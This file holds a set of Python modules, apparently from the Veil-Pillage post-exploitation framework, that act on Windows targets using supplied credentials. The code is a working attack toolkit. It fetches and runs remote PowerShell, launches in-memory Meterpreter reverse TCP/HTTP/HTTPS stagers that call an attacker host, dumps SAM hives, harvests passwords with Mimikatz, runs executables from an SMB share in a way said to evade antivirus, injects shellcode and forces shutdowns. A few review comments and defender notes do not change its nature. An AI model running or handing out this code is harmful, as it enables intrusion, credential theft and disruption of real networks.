        downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments

    # get the encoded powershell command
    triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)

    # if we want to get output from the final execution, append it
    # (plain cmd.exe redirection; outFile is not quoted)
    if outFile:
        triggerCMD += " > " + outFile

    # execute the powershell trigger command on each target.
    # Defender note: an encoded PowerShell command line started by a remote
    # execution method, followed by an outbound HTTP(S) fetch from that process,
    # is visible in process-creation and script-block logging.
    for target in targets:
        print "\n [*] Executing command on "+target
        out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def run(self):
    """
    Issue an immediate forced shutdown (``shutdown -t 0 -s -f``) on every
    target using the configured trigger method.

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output, chosen
    by whether the executeCommand() result contains "success". The status
    line embeds the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # shutdown.exe command to shut the machine down immediately (-t 0),
        # powering off (-s) and forcing running applications closed (-f)
        command = "shutdown -t 0 -s -f"
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # assumes executeCommand() returns a string; a None result would raise here
        if "success" in result:
            self.output += "[*] Shutdown command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            self.output += "[!] Shutdown command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """
    Run ``logoff 1`` on every target using the configured trigger method,
    ending the interactive session with ID 1.

    Reads self.creds[0], self.required_options["trigger_method"] and
    self.targets; appends one status line per target to self.output, chosen
    by whether the executeCommand() result contains "success". The status
    line embeds the cleartext password. Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # logoff.exe command for session ID 1 (the session number is fixed;
        # it is not derived from "query user")
        command = "logoff 1"
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # assumes executeCommand() returns a string; a None result would raise here
        if "success" in result:
            self.output += "[*] Logoff command successfully triggered using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            self.output += "[!] Logoff command unsuccessful using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """
    Run a chain of domain enumeration commands (net view, net users, net
    groups, net accounts — all with /domain) on each target, redirecting their
    output to ``out_file`` on the target, wait 20 seconds, then fetch and
    delete that file over SMB and store it as enum_domain.txt via
    helpers.saveModuleFile().

    Reads self.creds[0], self.required_options["out_file"] and self.targets;
    appends one status line per target to self.output, embedding the
    cleartext password. The trigger method is hard-wired to winexe.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    outFile = self.required_options["out_file"][0]

    # wmis doesn't like net * /domain commands >_<
    triggerMethod = "winexe"

    # a bare file name (no backslash) is placed under the Windows temp directory
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile

    for target in self.targets:
        # unused; nothing below reads it
        targetUsernames = []

        # one cmd.exe line; every step appends to outFile. outFile is interpolated
        # unquoted, so a path containing spaces or '&' breaks the redirections.
        command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % { "p": outFile }

        # execute the command (the returned value is not used)
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # wait 20 seconds for commands to run; a fixed delay, so a slow
        # domain controller yields a partial file
        print helpers.color( "\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True)
        time.sleep(20)

        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)

        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
            self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
    """
    Run a chain of domain enumeration commands (net view, net users, net
    groups, net accounts — all with /domain) on each target, redirecting their
    output to ``out_file`` on the target, wait 20 seconds, then fetch and
    delete that file over SMB and store it as enum_domain.txt via
    helpers.saveModuleFile().

    Reads self.creds[0], self.required_options["out_file"] and self.targets;
    appends one status line per target to self.output, embedding the
    cleartext password. The trigger method is hard-wired to winexe.
    Returns nothing.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    outFile = self.required_options["out_file"][0]

    # wmis doesn't like net * /domain commands >_<
    triggerMethod = "winexe"

    # a bare file name (no backslash) is placed under the Windows temp directory
    if "\\" not in outFile:
        # otherwise assume it's an absolute path
        outFile = "C:\\Windows\\Temp\\" + outFile

    for target in self.targets:
        # unused; nothing below reads it
        targetUsernames = []

        # one cmd.exe line; every step appends to outFile. outFile is interpolated
        # unquoted, so a path containing spaces or '&' breaks the redirections.
        command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile}

        # execute the command (the returned value is not used)
        result = command_methods.executeCommand(target, username, password, command, triggerMethod)

        # wait 20 seconds for commands to run; a fixed delay, so a slow
        # domain controller yields a partial file
        print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
        time.sleep(20)

        # grab the output file and delete it
        out = smb.getFile(target, username, password, outFile, delete=True)

        if out != "":
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
            self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
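def run(self):
    """Launch a pure-PowerShell Meterpreter stager on every target.

    One of three in-memory stagers (rev_tcp, rev_http, rev_https) is
    parameterised with lhost/lport, encoded with helpers.encPowershell and
    executed on each target with the configured trigger method.  A matching
    multi/handler resource script is always written to /tmp/handler.rc; when
    spawn_handler is "true" msfconsole is started with it in a new
    gnome-terminal tab and the user is prompted before any target is touched.

    Returns "" (after a prompt) when the stager name is unknown or lport is not
    numeric; otherwise returns None.

    Side effects: appends to self.output and, per target, a
    `taskkill /f /im powershell.exe` entry to self.cleanup.  Both embed the
    cleartext password.

    NOTE(review): the rev_https stager sets ServerCertificateValidationCallback
    to {$true} on the target, i.e. it trusts whatever answers on lhost:lport.
    """
    # assume single set of credentials
    username, password = self.creds[0]

    # grab our options
    triggerMethod = self.required_options["trigger_method"][0]
    stager = self.required_options["stager"][0]
    lhost = self.required_options["lhost"][0]
    lport = self.required_options["lport"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    # lport is spliced into the PowerShell source and the handler script; a
    # non-numeric value would only fail later, on the target, so reject it now
    try:
        int(lport)
    except ValueError:
        print(helpers.color("\n [!] lport must be numeric, got '" + lport + "'\n", warning=True))
        raw_input("\n [>] Press enter to continue: ")
        return ""

    # The here-strings (@" ... "@) require real line breaks, so the templates
    # are kept multi-line.  %s -> lhost, lport; %% is a literal % in PowerShell.

    # the pure powershell windows/meterpreter/reverse_tcp stager
    revTCPStager = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" % (lhost, lport)

    # the pure powershell windows/meterpreter/reverse_http stager
    revHTTPStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" % (lhost, lport)

    # the pure powershell windows/meterpreter/reverse_https stager
    # (certificate validation is disabled on the target for the download)
    revHTTPSStager = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient; $m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" % (lhost, lport)

    # stager name -> (PowerShell source, Metasploit payload for the handler)
    stagers = {
        "rev_tcp": (revTCPStager, "windows/meterpreter/reverse_tcp"),
        "rev_http": (revHTTPStager, "windows/meterpreter/reverse_http"),
        "rev_https": (revHTTPSStager, "windows/meterpreter/reverse_https"),
    }
    stagerKey = stager.lower()
    if stagerKey not in stagers:
        print(helpers.color("\n [!] Stager not recognized: please enter rev_tcp, rev_http, or rev_https\n", warning=True))
        raw_input("\n [>] Press enter to continue: ")
        return ""
    stagerSource, payloadName = stagers[stagerKey]

    # get the encoded powershell trigger command
    triggerCMD = helpers.encPowershell(stagerSource)

    # build the handler resource script
    handler = "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD " + payloadName,
        "set LHOST " + lhost,
        "set LPORT " + lport,
        "set ExitOnSession false",
        "exploit -j",
    ]) + "\n"

    # /tmp is shared: create the script 0600 and refuse to follow a pre-planted
    # symlink rather than open()ing a fixed world-known path with default perms
    handlerPath = "/tmp/handler.rc"
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    with os.fdopen(os.open(handlerPath, flags, 0o600), "w") as f:
        f.write(handler)

    # build and spawn a handler for the invoked payload
    if spawnHandler.lower() == "true":
        # command to spawn a new tab
        cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
        # invoke msfconsole with the handler script in a new tab
        os.system(cmd)
        raw_input("\n\n [>] Press enter when handler is ready: ")

    # cleanup is blunt: every powershell.exe on the target gets killed
    killCMD = "taskkill /f /im powershell.exe"

    # execute the powershell trigger command on each target
    for target in self.targets:
        print("\n [*] Triggering powershell stager '" + stagerKey + "' with lhost=" + lhost + " and lport=" + lport + " on " + target)
        self.output += "[*] Triggering powershell stager '" + stagerKey + "' with lhost=" + lhost + " and lport=" + lport + " using creds '" + username + ":" + password + "' on " + target + "\n"

        command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"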
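def run(self):
    """Dump local account hashes from each target via `reg save` of the SAM/SYSTEM/SECURITY hives.

    The hives are saved to C:\\Windows\\Temp on the target with reg.exe, copied
    back over SMB to /tmp/{system,security,sam} and fed to
    creddump.dump_file_hashes.  Per-target hashes are stored with
    helpers.saveModuleFile; a sorted, de-duplicated union of every hash seen
    is appended to self.output at the end.

    SECURITY is fetched but not used by the dump, so only a missing SYSTEM or
    SAM hive marks the target as failed.  Uses the first credential pair only.

    Side effects: self.output gains status lines and self.cleanup gains a
    `del` entry per target for the remote hive copies (both embed the
    cleartext password).  The local copies under /tmp are written 0600 but are
    not removed afterwards.
    """
    import os

    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    # reg.exe command to save off the hives
    regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
    # the saved hives are a full copy of the host's credential store: schedule their removal
    delHivesCMD = "del C:\\Windows\\Temp\\system C:\\Windows\\Temp\\security C:\\Windows\\Temp\\sam"

    # (local name, remote path) — fetched in this order; SECURITY is optional
    remoteHives = (
        ("system", "C:\\Windows\\Temp\\system"),
        ("security", "C:\\Windows\\Temp\\security"),
        ("sam", "C:\\Windows\\Temp\\sam"),
    )
    credTag = "using creds '" + username + ":" + password + "' on "

    def writePrivate(localPath, data):
        # hive dumps are credential material and /tmp is world-writable: 0600 and
        # no symlink following instead of open(path, "w") with default perms
        flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
        with os.fdopen(os.open(localPath, flags, 0o600), "w") as f:
            f.write(data)

    # let's keep track of ALL hashes found
    allHashes = ""

    for target in self.targets:
        print(helpers.color("\n [*] Dumping hashes on " + target))

        # execute the registry save command, and remember to remove what it wrote
        command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delHivesCMD + "|" + triggerMethod + "\n"

        # give reg.exe a moment to finish writing before pulling the files
        time.sleep(5)

        error = False
        for name, remotePath in remoteHives:
            data = smb.getFile(target, username, password, remotePath, delete=False)
            if data == "":
                # name the remote file (the original message printed the empty content)
                self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
                if name != "security":
                    error = True
            else:
                writePrivate("/tmp/" + name, data)

        if error:
            self.output += "[!] Error executing hashdump " + credTag + target + "\n"
            continue

        # get all the hashes from these hives
        hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
        allHashes += hashes

        # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
        saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
        self.output += "[*] dumped hashes (reg.exe) " + credTag + target + " saved to " + saveLocation + "\n"

    if allHashes != "":
        # get all non-empty hashes, uniquify and sort them
        uniqueHashes = sorted(set(h.lower() for h in allHashes.split("\n") if h != ""))
        self.output += "[*] All unique hashes:\n" + "\n".join(uniqueHashes) + "\n"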
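def run(self):
    """Grab credentials (registry hashes plus in-memory Mimikatz output) from every target.

    Per target one of two methods is used.  If PowerShell answers the probe
    (or force_method is "powershell"), autograb.ps1 — the combined
    Invoke-Mimikatz/powerdump script — is hosted from lhost via
    delivery_methods.powershellHostTrigger and writes to out_file on the
    target.  Otherwise (or when force_method is "binary") the
    SAM/SYSTEM/SECURITY hives are saved with reg.exe and parsed locally with
    creddump, then the architecture-matching mimikatz binary is hosted with
    delivery_methods.hostTrigger and run with `sekurlsa::logonPasswords full`.

    Parsed results (hashes, msv1_0, kerberos, wdigest, tspkg) are collected
    across all targets, de-duplicated and appended to self.output at the end;
    raw output per target is stored with helpers.saveModuleFile.

    Raises ValueError before touching any target when delay is not an integer.

    Side effects: status lines in self.output embed the cleartext password;
    local hive copies go to /tmp/{system,security,sam} (0600, not removed);
    in the binary path a `del` entry for the remote hive copies is added to
    self.cleanup.
    """
    import os

    # assume single set of credentials for this module
    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # fail on a bad delay now, not after the first target's payload is already running
    waitSeconds = int(delay)

    # a bare file name lands in C:\Windows\Temp; a path with a backslash is taken
    # as absolute.  Hoisted out of the loop — re-checking per target was a no-op
    # after the first iteration anyway.
    if "\\" not in out_file:
        out_file = "C:\\Windows\\Temp\\" + out_file

    # reg.exe command to save off the hives, and the matching cleanup
    regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
    delHivesCMD = "del C:\\Windows\\Temp\\system C:\\Windows\\Temp\\security C:\\Windows\\Temp\\sam"
    remoteHives = (
        ("system", "C:\\Windows\\Temp\\system"),
        ("security", "C:\\Windows\\Temp\\security"),
        ("sam", "C:\\Windows\\Temp\\sam"),
    )
    credTag = "using creds '" + username + ":" + password + "' on "

    # let's keep track of all credentials found
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

    def writePrivate(localPath, data):
        # hive dumps are credential material and /tmp is world-writable: 0600,
        # no symlink following, instead of open(path, "w") with default perms
        flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
        with os.fdopen(os.open(localPath, flags, 0o600), "w") as f:
            f.write(data)

    def recordMimikatz(out):
        # parse the mimikatz output and append it to our globals
        (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
        allmsv.extend(msv1_0)
        allkerberos.extend(kerberos)
        allwdigest.extend(wdigest)
        alltspkg.extend(tspkg)

    for target in self.targets:
        # check if we're forcing a particular grab method
        method = force_method.lower()
        if method == "binary":
            powershellInstalled = False
        elif method == "powershell":
            powershellInstalled = True
        else:
            # probe: a functional PowerShell echoes the literal 42 back
            powershellCommand = 'powershell.exe -c "$a=42;$a"'
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
            powershellInstalled = powershellResult.strip() == "42"

        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print(helpers.color("\n [*] Powershell installed on " + target))
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

            # trigger the powershell download on just this target
            delivery_methods.powershellHostTrigger(
                target, username, password, secondStagePath, lhost, "",
                triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True,
            )

            print("\n [*] Waiting " + delay + "s for Autograb to run...")
            time.sleep(waitSeconds)

            # grab the output file and delete it
            out = smb.getFile(target, username, password, out_file, delete=True)
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

            recordMimikatz(out)
            # parse the powerdump component
            allhashes.extend(helpers.parseHashdump(out))

            if out != "":
                self.output += "[*] Autograb.ps1 results " + credTag + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Autograb.ps1 failed " + credTag + target + " : no result file\n"
            continue

        # ---- binary path: reg.exe for hashdump and host/execute for mimikatz ----
        print(helpers.color("\n [!] Powershell not installed on " + target, warning=True))
        print(helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target))
        self.output += "[!] Powershell not installed on " + target + "\n"

        command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delHivesCMD + "|wmis\n"

        print(helpers.color("\n [*] Dumping hashes on " + target))
        # give reg.exe a moment to finish writing before pulling the files
        time.sleep(5)

        hiveMissing = False
        for name, remotePath in remoteHives:
            data = smb.getFile(target, username, password, remotePath, delete=False)
            if data == "":
                self.output += "[!] File '" + remotePath + "' from " + target + " empty or doesn't exist\n"
                if name != "security":
                    hiveMissing = True
            else:
                writePrivate("/tmp/" + name, data)

        if hiveMissing:
            # the original ran creddump regardless, which either raised on the
            # missing file or parsed a stale /tmp hive left by a previous target
            self.output += "[!] Error executing hashdump " + credTag + target + "\n"
        else:
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += "[*] dumped hashes (reg.exe) " + credTag + target + " saved to " + saveLocation + "\n"
            allhashes.extend(helpers.parseHashdump(out))

        # detect the architecture so the right mimikatz build is hosted
        archResult = command_methods.executeResult(target, username, password, "echo %PROCESSOR_ARCHITECTURE%", "wmis")
        arch = "x64" if "64" in archResult else "x86"
        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

        exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

        # host mimikatz.exe and trigger it ONLY on this particular machine
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(waitSeconds)

        out = smb.getFile(target, username, password, out_file, delete=True)
        recordMimikatz(out)
        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

        if out != "":
            self.output += "[*] Mimikatz results " + credTag + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] Mimikatz failed " + credTag + target + " : no result file\n"

    # summarise everything found, de-duplicated and sorted
    summaries = (
        ("All unique hashes", allhashes),
        ("All msv1_0", allmsv),
        ("All kerberos", allkerberos),
        ("All wdigest", allwdigest),
        ("All tspkg", alltspkg),
    )
    for label, found in summaries:
        if found:
            self.output += "[*] " + label + ":\n\t" + "\n\t".join(sorted(set(found))) + "\n"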
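def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
    """Host exePath on a local Impacket SMB share and run it on each target via a UNC path.

    The binary is copied to settings.TEMP_DIR/shared/<random>.exe, a
    smb.ThreadedSMBServer is started, and for every target the command
    "\\\\localHost\\system\\<random>.exe <exeArgs>" is executed with
    triggerMethod (default wmis), so the target loads the executable straight
    from our share.  After a fixed 10 second grace period the server is shut
    down and the shared directory removed — in a finally block, so a failing
    trigger no longer leaves the server and the hosted binary behind.

    Takes 'targets' instead of a single 'target' so the server is not set up
    and torn down per host; a single str is wrapped into a list.

    Args:
        exePath: local path of the binary to host (copied with shutil, not via
            an unquoted shell "cp", so odd characters in the path are safe).
        localHost: address the targets use to reach this host's SMB server.
        exeArgs: appended verbatim after the UNC path.

    Returns:
        The randomised hosted file name, for callers that later want to kill
        the spawned process.

    The original author notes this in-memory UNC execution evades several AV
    products even for otherwise disk-detectable executables.  NOTE(review):
    the share used on the command line is "system", not the "\\\\localHost\\exe"
    the old docstring described.
    """
    import shutil

    # if we get a single target, make it into a list
    if isinstance(targets, str):
        targets = [targets]

    # randomize the hosted .exe file name
    hostedFileName = helpers.randomString() + ".exe"

    # assumes settings.TEMP_DIR is absolute (the original prefixed "/" only in the
    # copy step, so a relative TEMP_DIR would never have worked) — TODO confirm
    shareDir = os.path.join(settings.TEMP_DIR, "shared")
    if not os.path.exists(shareDir):
        os.makedirs(shareDir)

    # copy the payload to the random hostedFileName in the temp directory
    shutil.copy(exePath, os.path.join(shareDir, hostedFileName))

    # spin up the SMB server
    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    try:
        # build the UNC path back to our host and executable and any specified arguments
        cmd = "\\\\" + localHost + "\\system\\" + hostedFileName + " " + exeArgs

        for target in targets:
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)

        print(helpers.color("\n [*] Giving time for commands to trigger..."))
        # sleep so the wmis/winexe commands can trigger and the target
        # can grab the .exe from the SMB server
        time.sleep(10)
    finally:
        # always tear the share down and drop the hosted binary
        server.shutdown()
        shutil.rmtree(shareDir, ignore_errors=True)

    return hostedFileName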
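def run(self):
    """Inject Veil-Evasion shellcode on each target through an uploaded minimal Python.

    Shellcode is produced by shellcode.Shellcode() (msfpayload/msfoptions or
    custom shellcode from self.args), base64-encoded and wrapped in a one-line
    `python -c` ctypes cast-and-call.  7za.exe and python.zip from
    data/environments are uploaded to C:\\Windows\\Temp over SMB, unpacked with
    7za, and the injector line is run with the configured trigger method.
    With spawn_handler "true" the handler script from helpers.shellcodeToHandler
    is started in a new gnome-terminal tab and the user is prompted first.

    Side effects: self.output gains status lines and self.cleanup gains a
    taskkill entry and a delete entry per target (all embed the cleartext
    password).

    Fix over the original: the custom-handler branch tested os.path.isdir on a
    resource-script path; it now tests os.path.isfile.  NOTE(review): that
    branch is unreachable as written — handlerPath is the literal "none"
    unless spawn_handler is "true" — and the unzip and inject commands are
    issued back to back with no wait for 7za to finish.
    """
    handlerPath = "none"

    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    def spawnHandlerTab(path, prompt):
        # open msfconsole with the resource script in a new gnome-terminal tab,
        # then block until the operator confirms the handler is listening
        cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + path + "'\""
        os.system(cmd)
        raw_input(prompt)

    # nab up some shellcode from Veil-Evasion
    sc = shellcode.Shellcode()
    if self.args.msfpayload:
        sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    # the generated shellcode is an escaped "\x.." string; string_escape is Python 2 only
    b64sc = base64.b64encode(sc.generate().decode("string_escape"))

    # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    if spawnHandler.lower() == "true":
        # turn our shellcode object into a handler script
        handlerPath = helpers.shellcodeToHandler(sc)
        if handlerPath != "":
            spawnHandlerTab(handlerPath, "\n\n [>] Press enter when handler is ready: ")
    elif handlerPath.lower() != "none":
        # a handler script is a file, not a directory
        if os.path.isfile(handlerPath):
            spawnHandlerTab(handlerPath, "\n [>] Press enter when handler is ready: ")
        else:
            print(helpers.color(" [!] Warning: handlerPath '" + handlerPath + "' not valid!"))

    # the doubled backslashes survive one extra unescaping layer in the trigger path
    # command to unzip the uploaded python installation
    unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
    # path to the 7zip binary
    zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"
    # command to invoke shellcode using python
    pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (b64sc)
    # path to the minimal python install
    pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

    # cleanup: kill all python processes, then remove the extracted directory,
    # the zipped environment and the 7za.exe binary
    killCMD = "taskkill /f /im python.exe"
    delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"

    credTag = "using creds '" + username + ":" + password + "' on "

    for target in self.targets:
        # upload the 7zip.exe binary and the python install
        uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])
        if uploadResult != "success":
            self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded " + credTag + target + "\n"
            print(helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True))
            continue

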